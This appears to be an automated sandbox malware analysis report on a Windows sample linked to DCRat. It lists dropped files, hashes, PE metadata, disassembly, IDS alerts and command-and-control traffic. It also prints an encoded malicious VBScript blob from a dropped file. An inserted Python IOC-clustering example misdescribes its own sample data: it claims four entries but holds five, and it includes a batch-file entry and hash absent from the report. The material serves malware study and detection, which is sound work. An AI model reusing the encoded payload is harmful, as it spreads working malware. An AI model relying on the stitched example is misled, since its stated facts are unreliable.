              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................F$..6.......d$.. ....$...@.. ........................%...........@..................................d$.K.....$.......................$...................................................... ............... ..H............text....D$.. ...F$................. ..`.sdata.../....$..0...J$.............@....rsrc.........$......z$.............@..@.reloc........$......~$.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\brokermonitordhcp\portruntime.exe
              File Type:ASCII text, with very long lines (301), with no line terminators
              Category:dropped
              Size (bytes):301
              Entropy (8bit):5.772897836532947
              Encrypted:false
              SSDEEP:6:tWjOv8BnFaY66tu1dEMkUbtK1cFxl4LbFGRK3XkJ4nuyn:Ue8/i1dEMdbtK1cIARKHVxn
              MD5:680AA051B21C4D25F0C61EB6CB34A4F1
              SHA1:7A89FBE53815E4271433F2EA6C455C427E163F27
              SHA-256:E1F9F8012E3DBBA85AAD89FAA0D559A0A25A794E7EEAF6F621027196F4B358F5
              SHA-512:EF7F07AEAD0C0B60A5CEDCA9188CAAC97C676DA4C25816B6DAD59B8B37B0EC73DA38E3F729F511E895787377E85A72D6E9A1232541CB134286DD25DF0F9A4448
              Malicious:false
              Preview:ptbdZJs8qXIBtlSgFYScjFEOhMniHT1nhUWrx6caBBiaFupFxT3M5mskpM5MgK0WfedYOktJ51ahhnJwghuyaos4lwCkAQ41KL5kQQ1MjuRDMKDBDIp8ZC60wjwbiIIp7jXVsigPqiOpXosatAh1k5cIPEyreZoammGnxrTemZS0yRcI1VrhlQFBGPGnuzvQ4xCuhEnBrDPKnlU7lqzJsGzWhEgilptxoB6AOskwsp0iA4Yf5IBE9mix8qNdiEaCTcflpTt3FDaCQQVmpAndnpxCcJBheHNnPyPiYw0lZI86L
              Process:C:\Users\user\Desktop\QIKiV83Pkl.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):38
              Entropy (8bit):4.080439935112
              Encrypted:false
              SSDEEP:3:I53qTCTVQeOLAEn:IICZMJn
              MD5:5AB5AD6EA2C7E5AB60EF6756FBB4ECB5
              SHA1:7BE45873196B156F9881E35A82605F4E587B7388
              SHA-256:D5EA618EFDAA2D6F994BC244E3870F3951DE0F5786BF6D126C93FF323C924D0F
              SHA-512:CDA69B6B56A4E0C3E8A5316F83A1BD85C2F7D49980377434F43E63355C354E4B4C9A5AD7EE9A34452373A23C3231B07967175231B63D890B33DFDC1CE57071A5
              Malicious:false
              Preview:"C:\brokermonitordhcp\portruntime.exe"
              Process:C:\brokermonitordhcp\portruntime.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):2392064
              Entropy (8bit):7.602728589366172
              Encrypted:false
              SSDEEP:49152:i8c1CwZZmO9DQC6pX/PiyS3DAKF6aMS8gRDs6/STCqs82kPq5Xom:i8UCwZZ2rR/Pi1UraxTKTCRem
              MD5:DE91A616A55A97BB434BC118AF3E0E7B
              SHA1:D489795B1A54E11703F50E06F97FBF971446FDE1
              SHA-256:103B85E8B21ECE8CC40D4C9DAF93ED6CAF90C27C2E933CCF9749027AA2FAAB80
              SHA-512:DE5FBC67A1C5936F28A120D176AA7FEC7DF752D1C131B2FBEC4EB57DB3A69445C8708D5DE52FBAC2FF9484285D18E91943C94D51E5437674A9039906F3D1DBBF
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 88%
              • Antivirus: Virustotal, Detection: 68%, Browse
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................F$..6.......d$.. ....$...@.. ........................%...........@..................................d$.K.....$.......................$...................................................... ............... ..H............text....D$.. ...F$................. ..`.sdata.../....$..0...J$.............@....rsrc.........$......z$.............@..@.reloc........$......~$.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Users\user\Desktop\QIKiV83Pkl.exe
              File Type:data
              Category:dropped
              Size (bytes):209
              Entropy (8bit):5.754247786392974
              Encrypted:false
              SSDEEP:6:GxWvwqK+NkLzWbHa/JUrFnBaORbM5nCSQ1kN1a047:GxFMCzWLauhBaORbQCSQ1u47
              MD5:CD12A9AC9568AF0D511CCF5A17E5A8BA
              SHA1:BE77E6B06727F2B9B3AB93414820D3D0140A8D4F
              SHA-256:39B5E8F5611691FE9AC32CDE9216BC0F2258A241203E158799F1E5B643045E96
              SHA-512:D48EFD007A72295C14068A0BE30FDDE138683119638F441F38171689E896121C91B6E0A363EF9EB0C362C9D4515651B1E801FE77A5FBB256E88FBD033D9552EF
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              Preview:#@~^uAAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vFT!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=z8MW0+DsW.rYKD[t1w&+k;IHVZ.NvdtJnc4mYE~~TBPWl^d+xDoAAA==^#~@.
              Process:C:\brokermonitordhcp\portruntime.exe
              File Type:ASCII text, with very long lines (467), with no line terminators
              Category:dropped
              Size (bytes):467
              Entropy (8bit):5.858748287472446
              Encrypted:false
              SSDEEP:12:DY0EeSKG/9pNAgaQQOg+Ay55JQD3d9qBWT:DJdOLNNRJ5SoE
              MD5:C67F61606F6B7678949E5000F58DDEAB
              SHA1:1E9DE8D7D7A84CCAA61B5A353554516CE80F75F5
              SHA-256:2DE95D06F6D0BAD60A796D981750261EC8105089B9838430193DB8F83563C959
              SHA-512:725C0FCA7CD287CC9E466F2D29585967ECECF3CC2E5CCD09F3C855D6182B984B66EBF4E87B9468E1B02CC32B2545CD8E8C88A28823C60345339A810130DE6745
              Malicious:false
              Preview:DvJVxdKGZgjwOllEieL76TZplj2KeMgRTqemDppoMZjNh9KqDWWfczguVeuNk9mMASdhH8A3zgvgtLIlZLHH0AzeKtQj5bDMxXNOgmjFVcq5E9BKWIyY2eW9c9XXrb8XcitW83FwmCwYT3ZLrGNwnoTTANvgPMX4eScfQpLcDBw0r8qjjLpkNMuyOaVvHihZo13Ab45C5utl1dlChM7DgwqSioQzTaVedXL0EpIpQnpdcI6vySN4le32KlcwnFsfYOIeRv81ERw3HNzZrfBAMb38eTpcNVBL4KEOAbdDUW0Ts9u7wCEIErT7UJA7GfotQl96JkZQB7qzkkQeirpKQ3HM1G31bg7zrHDGAyxLnyHHBdWu2fZYzecWewFDriyf90IdhJdu4ehcwALXtI85Gj9NoqmOsteF9mHKU3NsCodV6AkdlsUij3YZ15z0hPCK9ccJ2AC04Q3cGoQoFJn
              Process:C:\Users\user\Desktop\QIKiV83Pkl.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):2392064
              Entropy (8bit):7.602728589366172
              Encrypted:false
              SSDEEP:49152:i8c1CwZZmO9DQC6pX/PiyS3DAKF6aMS8gRDs6/STCqs82kPq5Xom:i8UCwZZ2rR/Pi1UraxTKTCRem
              MD5:DE91A616A55A97BB434BC118AF3E0E7B
              SHA1:D489795B1A54E11703F50E06F97FBF971446FDE1
              SHA-256:103B85E8B21ECE8CC40D4C9DAF93ED6CAF90C27C2E933CCF9749027AA2FAAB80
              SHA-512:DE5FBC67A1C5936F28A120D176AA7FEC7DF752D1C131B2FBEC4EB57DB3A69445C8708D5DE52FBAC2FF9484285D18E91943C94D51E5437674A9039906F3D1DBBF
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 88%
              • Antivirus: Virustotal, Detection: 68%, Browse
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................F$..6.......d$.. ....$...@.. ........................%...........@..................................d$.K.....$.......................$...................................................... ............... ..H............text....D$.. ...F$................. ..`.sdata.../....$..0...J$.............@....rsrc.........$......z$.............@..@.reloc........$......~$.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Windows\System32\w32tm.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):151
              Entropy (8bit):4.777828636831807
              Encrypted:false
              SSDEEP:3:VLV993J+miJWEoJ8FXgKtR96SfTrN1dJFAX6rv:Vx993DEUctR96SPxN
              MD5:7FC16AE4EB072CD4234F1C814467B7BF
              SHA1:07823630BC6DA6CF68ADD825BB35828EBEB78C2D
              SHA-256:20A5E55CAB868071934BEFCD205102BBCD42A10160F91E7996BAA4A47CABB707
              SHA-512:77E5C9EFE3FE4F48BA353DB1DD3D02491235344BC0B904C1C9DA87B560254D49D66522CAC68FC6CECCBAF480C9EEDCA5B4DC22A6EAAFE6F1A5417FC69200B877
              Malicious:false
              Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 27/07/2024 07:10:47..07:10:47, error: 0x800705B4.07:10:53, error: 0x800705B4.
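The dropped-file list above repeats the same 2392064-byte Mono/.Net executable (SHA-256 103B85E8…AB80) many times, written by both the original sample and by portruntime.exe, alongside one-off text blobs, the launcher batch and the w32tm output. For triage that is one payload with several persistence locations, not seven payloads. The following Python is an added example, not part of the Joe Sandbox report, that parses this entry format and clusters entries by SHA-256 so the IOC set comes out deduplicated with the writing processes and the highest detection rate per hash. SAMPLE_REPORT is an abridged copy of four entries from the list above; no other input is assumed.

```python
import re
from collections import defaultdict

AV_RE = re.compile(r"Antivirus:\s*(?P<engine>[^,]+),\s*Detection:\s*(?P<pct>\d+)%")


def parse_entries(report_text):
    """Split the dropped-file listing into one dict per entry. An entry starts
    at a 'Process:' line; 'Antivirus' collects (engine, percent) pairs."""
    entries, cur = [], None
    for raw in report_text.splitlines():
        line = raw.strip().lstrip("•*-").strip()
        if not line:
            continue
        if line.startswith("Process:"):
            cur = {"Antivirus": []}
            entries.append(cur)
        if cur is None:
            continue
        if line.startswith("Antivirus:"):
            m = AV_RE.match(line)
            if m:                      # the bare 'Antivirus:' header line does not match
                cur["Antivirus"].append((m["engine"].strip(), int(m["pct"])))
            continue
        key, sep, value = line.partition(":")
        if sep:
            cur[key.strip()] = value.strip()
    return entries


def cluster_by_sha256(entries):
    """Group entries by SHA-256: identical bytes written to several paths are
    one payload with several drop locations."""
    clusters = defaultdict(lambda: {
        "count": 0, "writers": set(), "size": 0, "file_type": "",
        "malicious": False, "max_detection": 0,
    })
    for e in entries:
        sha = e.get("SHA-256")
        if not sha:
            continue
        c = clusters[sha.lower()]
        c["count"] += 1
        c["writers"].add(e.get("Process", ""))
        c["size"] = int(e.get("Size (bytes)", "0") or 0)
        c["file_type"] = e.get("File Type", "")
        c["malicious"] = c["malicious"] or e.get("Malicious", "").lower() == "true"
        c["max_detection"] = max([c["max_detection"]] + [p for _, p in e["Antivirus"]])
    return dict(clusters)


def ioc_summary(report_text):
    """(sha256, cluster) pairs, malicious first, then most-dropped."""
    clusters = cluster_by_sha256(parse_entries(report_text))
    return sorted(clusters.items(),
                  key=lambda kv: (not kv[1]["malicious"], -kv[1]["count"], kv[0]))


# Abridged copy of four entries from the report's dropped-file list.
SAMPLE_REPORT = r"""
Process:C:\brokermonitordhcp\portruntime.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):2392064
SHA-256:103B85E8B21ECE8CC40D4C9DAF93ED6CAF90C27C2E933CCF9749027AA2FAAB80
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 88%
• Antivirus: Virustotal, Detection: 68%, Browse
Process:C:\brokermonitordhcp\portruntime.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):2392064
SHA-256:103B85E8B21ECE8CC40D4C9DAF93ED6CAF90C27C2E933CCF9749027AA2FAAB80
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 88%
Process:C:\Users\user\Desktop\QIKiV83Pkl.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):2392064
SHA-256:103B85E8B21ECE8CC40D4C9DAF93ED6CAF90C27C2E933CCF9749027AA2FAAB80
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 88%
Process:C:\brokermonitordhcp\portruntime.exe
File Type:DOS batch file, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):215
SHA-256:49C4B47FAEF0D51DEDF71377C858CD63FC7F3469D824BC1558CF260BE0E8D89D
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
Process:C:\Windows\System32\w32tm.exe
File Type:ASCII text
Category:dropped
Size (bytes):151
SHA-256:20A5E55CAB868071934BEFCD205102BBCD42A10160F91E7996BAA4A47CABB707
Malicious:false
"""

if __name__ == "__main__":
    for sha, c in ioc_summary(SAMPLE_REPORT):
        print(sha[:16], c["count"], "x", c["size"], "bytes", c["max_detection"], "%", sorted(c["writers"]))
```

Clustering on SHA-256 rather than on path also catches the second-stage pattern visible here: the original sample writes the payload once and the copy in C:\brokermonitordhcp then re-writes it to further locations, so the writer set for one hash grows while the hash count stays one.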
              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):7.459746383766598
              TrID:
              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
              • Win32 Executable (generic) a (10002005/4) 49.97%
              • Generic Win/DOS Executable (2004/3) 0.01%
              • DOS Executable Generic (2002/1) 0.01%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:QIKiV83Pkl.exe
              File size:2'777'219 bytes
              MD5:2c00ebc767b339c3baf6bcf3086edf51
              SHA1:fd1aac21bf1604a175e1d87fa174d832503e3a79
              SHA256:67e022273972cda8e1633f002043e4f03cc62bf603bfc95dd5c78af8c0cfb5d2
              SHA512:6a93dc3059d6d293701aea06b368cfb9c7e807bcbbf93a34b62cc7b7541ce4b9c831ac270a19e1fb3b1dcc1a27425ed84796a5a435e6920de52610114a6462a8
              SSDEEP:49152:MbA37V8c1CwZZmO9DQC6pX/PiyS3DAKF6aMS8gRDs6/STCqs82kPq5Xom5:Mb68UCwZZ2rR/Pi1UraxTKTCRem5
              TLSH:54D5BE017E48B951E41816F7C3EF45044BB4A8D026B6E7DB7AB93F6D26163D22C0CADB
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..
              Icon Hash:0f33a8b286230f8c
              Entrypoint:0x41ec40
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Time Stamp:0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:5
              OS Version Minor:1
              File Version Major:5
              File Version Minor:1
              Subsystem Version Major:5
              Subsystem Version Minor:1
              Import Hash:fcf1390e9ce472c7270447fc5c61a0c1
              Instruction
              call 00007F84409CCF59h
              jmp 00007F84409CC96Dh
              cmp ecx, dword ptr [0043E668h]
              jne 00007F84409CCAE5h
              ret
              jmp 00007F84409CD0DEh
              int3
              int3
              int3
              int3
              int3
              push ebp
              mov ebp, esp
              push esi
              push dword ptr [ebp+08h]
              mov esi, ecx
              call 00007F84409BF877h
              mov dword ptr [esi], 00435580h
              mov eax, esi
              pop esi
              pop ebp
              retn 0004h
              and dword ptr [ecx+04h], 00000000h
              mov eax, ecx
              and dword ptr [ecx+08h], 00000000h
              mov dword ptr [ecx+04h], 00435588h
              mov dword ptr [ecx], 00435580h
              ret
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              lea eax, dword ptr [ecx+04h]
              mov dword ptr [ecx], 00435568h
              push eax
              call 00007F84409CFC7Dh
              pop ecx
              ret
              push ebp
              mov ebp, esp
              sub esp, 0Ch
              lea ecx, dword ptr [ebp-0Ch]
              call 00007F84409BF80Eh
              push 0043B704h
              lea eax, dword ptr [ebp-0Ch]
              push eax
              call 00007F84409CF392h
              int3
              push ebp
              mov ebp, esp
              sub esp, 0Ch
              lea ecx, dword ptr [ebp-0Ch]
              call 00007F84409CCA84h
              push 0043B91Ch
              lea eax, dword ptr [ebp-0Ch]
              push eax
              call 00007F84409CF375h
              int3
              jmp 00007F84409D13C3h
              jmp dword ptr [00433260h]
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              push 00421EB0h
              push dword ptr fs:[00000000h]
              Programming Language:
              • [ C ] VS2008 SP1 build 30729
              • [IMP] VS2008 SP1 build 30729
              • [C++] VS2015 UPD3.1 build 24215
              • [EXP] VS2015 UPD3.1 build 24215
              • [RES] VS2015 UPD3 build 24213
              • [LNK] VS2015 UPD3.1 build 24215
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x3c820          0x34          .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT          0x3c854          0x3c          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x63000          0x1e8c8       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x82000          0x2268        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x3aac0          0x54          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x35508          0x40          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x33000          0x260         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x3bdc4          0x120         .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy             Characteristics
.text   0x1000           0x310ea       0x31200   c5bf61bbedb6ad471e9dc6266398e965  False     0.583959526081425    data       6.708075396341128   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0x33000          0xa612        0xa800    7980b588d5b28128a2f3c36cabe2ce98  False     0.45284598214285715  data       5.221742709250668   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x3e000          0x23728       0x1000    201530c9e56f172adf2473053298d48f  False     0.36767578125        data       3.7088186669877685  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat  0x62000          0x188         0x200     c5d41d8f254f69e567595ab94266cfdc  False     0.4453125            data       3.2982538067961342  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc   0x63000          0x1e8c8       0x1ea00   aa69ae8bca206c0daaa43c0544690fca  False     0.19543207908163265  data       3.7734005483467628  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x82000          0x2268        0x2400    c7a942b723cb29d9c02f7c611b544b50  False     0.7681206597222222   data       6.5548620101740545  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
              Name | RVA | Size | Type | Language | Country | ZLIB Complexity
              PNG | 0x63614 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
              PNG | 0x6415c | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
              RT_ICON | 0x65708 | 0x1945 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9799041582933993
              RT_ICON | 0x67050 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536 | | | 0.040547734532118775
              RT_ICON | 0x77878 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384 | | | 0.08650212564950402
              RT_ICON | 0x7baa0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | | | 0.1204356846473029
              RT_ICON | 0x7e048 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | | | 0.174718574108818
              RT_ICON | 0x7f0f0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | | | 0.3333333333333333
              RT_DIALOG | 0x7f558 | 0x286 | data | English | United States | 0.5092879256965944
              RT_DIALOG | 0x7f7e0 | 0x13a | data | English | United States | 0.60828025477707
              RT_DIALOG | 0x7f91c | 0xec | data | English | United States | 0.6991525423728814
              RT_DIALOG | 0x7fa08 | 0x12e | data | English | United States | 0.5927152317880795
              RT_DIALOG | 0x7fb38 | 0x338 | data | English | United States | 0.45145631067961167
              RT_DIALOG | 0x7fe70 | 0x252 | data | English | United States | 0.5757575757575758
              RT_STRING | 0x800c4 | 0x1e2 | data | English | United States | 0.3900414937759336
              RT_STRING | 0x802a8 | 0x1cc | data | English | United States | 0.4282608695652174
              RT_STRING | 0x80474 | 0x1b8 | data | English | United States | 0.45681818181818185
              RT_STRING | 0x8062c | 0x146 | data | English | United States | 0.5153374233128835
              RT_STRING | 0x80774 | 0x446 | data | English | United States | 0.340036563071298
              RT_STRING | 0x80bbc | 0x166 | data | English | United States | 0.49162011173184356
              RT_STRING | 0x80d24 | 0x152 | data | English | United States | 0.5059171597633136
              RT_STRING | 0x80e78 | 0x10a | data | English | United States | 0.49624060150375937
              RT_STRING | 0x80f84 | 0xbc | data | English | United States | 0.6329787234042553
              RT_STRING | 0x81040 | 0xd6 | data | English | United States | 0.5747663551401869
              RT_GROUP_ICON | 0x81118 | 0x5a | data | | | 0.7666666666666667
              RT_MANIFEST | 0x81174 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333
              DLL | Import
              KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
              gdiplus.dll | GdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc
              Language of compilation system | Country where language is spoken | Map
              English | United States |
              Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
              2024-07-27T11:37:33.132074+0200 | TCP | 2034194 | ET MALWARE DCRAT Activity (GET) | 49706 | 80 | 192.168.2.7 | 5.101.153.57
              2024-07-27T11:37:33.969083+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49705 | 40.68.123.157 | 192.168.2.7
              2024-07-27T11:38:12.236267+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49711 | 40.68.123.157 | 192.168.2.7
              Timestamp | Source Port | Dest Port | Source IP | Dest IP
              Jul 27, 2024 11:37:31.239613056 CEST | 49704 | 443 | 192.168.2.7 | 172.67.19.24
              Jul 27, 2024 11:37:31.239655018 CEST | 443 | 49704 | 172.67.19.24 | 192.168.2.7
              Jul 27, 2024 11:37:31.240503073 CEST | 49704 | 443 | 192.168.2.7 | 172.67.19.24
              Jul 27, 2024 11:37:31.252614975 CEST | 49704 | 443 | 192.168.2.7 | 172.67.19.24
              Jul 27, 2024 11:37:31.252626896 CEST | 443 | 49704 | 172.67.19.24 | 192.168.2.7
              Jul 27, 2024 11:37:31.738928080 CEST | 443 | 49704 | 172.67.19.24 | 192.168.2.7
              Jul 27, 2024 11:37:31.738996983 CEST | 49704 | 443 | 192.168.2.7 | 172.67.19.24
              Jul 27, 2024 11:37:31.743336916 CEST | 49704 | 443 | 192.168.2.7 | 172.67.19.24
              Jul 27, 2024 11:37:31.743356943 CEST | 443 | 49704 | 172.67.19.24 | 192.168.2.7
              Jul 27, 2024 11:37:31.743792057 CEST | 443 | 49704 | 172.67.19.24 | 192.168.2.7
              Jul 27, 2024 11:37:31.798994064 CEST | 49704 | 443 | 192.168.2.7 | 172.67.19.24
              Jul 27, 2024 11:37:31.840507984 CEST | 443 | 49704 | 172.67.19.24 | 192.168.2.7
              Jul 27, 2024 11:37:32.295350075 CEST | 443 | 49704 | 172.67.19.24 | 192.168.2.7
              Jul 27, 2024 11:37:32.295425892 CEST | 443 | 49704 | 172.67.19.24 | 192.168.2.7
              Jul 27, 2024 11:37:32.295523882 CEST | 49704 | 443 | 192.168.2.7 | 172.67.19.24
              Jul 27, 2024 11:37:32.301585913 CEST | 49704 | 443 | 192.168.2.7 | 172.67.19.24
              Jul 27, 2024 11:37:32.376226902 CEST | 49706 | 80 | 192.168.2.7 | 5.101.153.57
              Jul 27, 2024 11:37:32.382529020 CEST | 80 | 49706 | 5.101.153.57 | 192.168.2.7
              Jul 27, 2024 11:37:32.382600069 CEST | 49706 | 80 | 192.168.2.7 | 5.101.153.57
              Jul 27, 2024 11:37:32.382734060 CEST | 49706 | 80 | 192.168.2.7 | 5.101.153.57
              Jul 27, 2024 11:37:32.387579918 CEST | 80 | 49706 | 5.101.153.57 | 192.168.2.7
              Jul 27, 2024 11:37:33.129066944 CEST | 80 | 49706 | 5.101.153.57 | 192.168.2.7
              Jul 27, 2024 11:37:33.132074118 CEST | 49706 | 80 | 192.168.2.7 | 5.101.153.57
              Jul 27, 2024 11:37:33.137789011 CEST | 80 | 49706 | 5.101.153.57 | 192.168.2.7
              Jul 27, 2024 11:37:33.359345913 CEST | 80 | 49706 | 5.101.153.57 | 192.168.2.7
              Jul 27, 2024 11:37:33.368586063 CEST | 49706 | 80 | 192.168.2.7 | 5.101.153.57
              Timestamp | Source Port | Dest Port | Source IP | Dest IP
              Jul 27, 2024 11:37:31.228872061 CEST | 64828 | 53 | 192.168.2.7 | 1.1.1.1
              Jul 27, 2024 11:37:31.235738039 CEST | 53 | 64828 | 1.1.1.1 | 192.168.2.7
              Jul 27, 2024 11:37:32.311815023 CEST | 50092 | 53 | 192.168.2.7 | 1.1.1.1
              Jul 27, 2024 11:37:32.375680923 CEST | 53 | 50092 | 1.1.1.1 | 192.168.2.7
              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
              Jul 27, 2024 11:37:31.228872061 CEST | 192.168.2.7 | 1.1.1.1 | 0x86ff | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001) | false
